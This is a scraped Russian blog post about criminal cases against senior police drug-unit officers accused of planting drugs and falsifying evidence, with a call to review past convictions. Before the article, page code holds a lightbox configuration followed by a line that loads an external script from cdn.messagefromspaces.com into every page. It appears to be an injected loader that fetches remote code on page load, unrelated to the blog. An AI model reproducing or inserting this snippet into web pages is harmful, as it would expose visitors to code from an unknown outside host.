, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Путин устыдился и начал «отрабатывать по полной»?

25 Июн

В Энгельсе возбуждено https://lenta.ru/news/2019/06/24/srochnik/?utm_referrer=https%3A%2F%2Fzen.yandex.com  несколько уголовных дел в отношении начальника отдела по контролю за оборотом наркотиков.

Полицейскому вменяется часть 4 статьи 303 («Фальсификация результатов оперативно-розыскной деятельности»), также его обвиняют в превышении должностных полномочий, совершенном с применением насилия, и сбыте наркотических средств в крупном размере с использованием служебного положения.

В Москве задержали https://www.kommersant.ru/doc/4005516   бывшего начальника отделения по борьбе с незаконным оборотом наркотиков межмуниципального управления МВД «Раменское» подполковника полиции Дмитрия Понкратова по делу о подбросе амфетамина молодому человеку.

Действия офицера МВД были квалифицированы следователями как превышение должностных полномочий с причинением тяжких последствий (ч. 3 ст. 286 УК РФ), фальсификация доказательств (ст. 303 УК РФ), а также незаконное хранение наркотиков без цели сбыта (ч. 1 ст. 228 УК РФ).

Радует то, что взялись не за рядовых оперативников, а  за начальников.

Проверка работы оперативников началась после того, как судья  Раменского горсуда Вячеслав Груничев, усомнившись в обвинении, возвратил в прокуратуру уголовное дело.

Как после выяснилось, борцы с незаконным оборотом наркотиков, нанося удары  задержанному сантехнику толстой книгой по голове и руками по почкам, требовали, чтобы он позвонил кому-нибудь из своих знакомых и предложил тому купить у него амфетамин. По словам сантехника, ему говорили, что покупателя наркотика задержат, а его отпустят. Задержанный отказался. Тогда сфабриковали дело не него.

Есть надежда на то, что ответят за такие деяния и те, кто осуществлял ведомственный контроль, а также работники прокуратуры, обязанные выявлять фальсификации ещё на стадии возбуждения уголовного дела.

Почему прокурор, подписавший обвинительное заключение, не исполнил приказ Генерального  прокурора России о проверки доказательств, положенных в основу обвинения?

Но самое важное сейчас проверить все дела этих «борцов» с наркобизнесом. Возможно,  среди них есть уже осужденные судом и отбывающие наказания за деяния, которые они не совершали, но вынуждены были оговорить себя.

Способы фальсификации уголовных дел по всей стране больших отличий не имеют. Поэтому, используя знания о способах фальсификации уголовных дел, провести ревизию оперативно-розыскных материалов за последние 10 лет, которые  послужили поводом и основанием для возбуждения уголовных.

Эта работа позволит избавиться от тех увешанных званиями и наградами оперов, что свою карьеру строили на людском горе, заставляя россиян соглашаться с обвинениями в  преступлениях, которые они не совершали.

Вот только тогда можно сказать: «Да, гарант Конституции Владимир Путин устыдился такой правоприменительной практике, и начал «отрабатывать по полной».

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.